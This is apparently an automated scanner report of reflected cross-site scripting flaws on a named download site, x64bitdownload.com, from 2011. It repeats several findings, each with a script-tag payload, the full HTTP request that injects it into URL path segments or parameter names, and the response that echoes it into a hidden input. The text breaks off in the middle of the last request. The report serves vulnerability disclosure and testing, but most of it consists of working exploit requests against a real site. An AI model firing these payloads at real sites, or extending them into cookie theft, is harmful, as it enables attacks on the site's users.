The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34c74"><script>alert(1)</script>9bb43158f8a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads34c74"><script>alert(1)</script>9bb43158f8a/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:20:09 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21344
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/downloads34c74"><script>alert(1)</script>9bb43158f8a/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b3f8"><script>alert(1)</script>275bf41d948 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html7b3f8"><script>alert(1)</script>275bf41d948 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:21:09 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 61783
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html7b3f8"><script>alert(1)</script>275bf41d948"/> ...[SNIP]...
1.303. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f529"><script>alert(1)</script>0751029a53e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html?5f529"><script>alert(1)</script>0751029a53e=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:17:15 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 61789
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html?5f529"><script>alert(1)</script>0751029a53e=1"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52513"><script>alert(1)</script>afca5fe7516 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads52513"><script>alert(1)</script>afca5fe7516/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:23:21 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21344
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/downloads52513"><script>alert(1)</script>afca5fe7516/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6937"><script>alert(1)</script>33bac6575a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.htmlb6937"><script>alert(1)</script>33bac6575a4 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:24:23 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 60335
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.htmlb6937"><script>alert(1)</script>33bac6575a4"/> ...[SNIP]...
1.306. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1f66"><script>alert(1)</script>7df9bf07e5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html?c1f66"><script>alert(1)</script>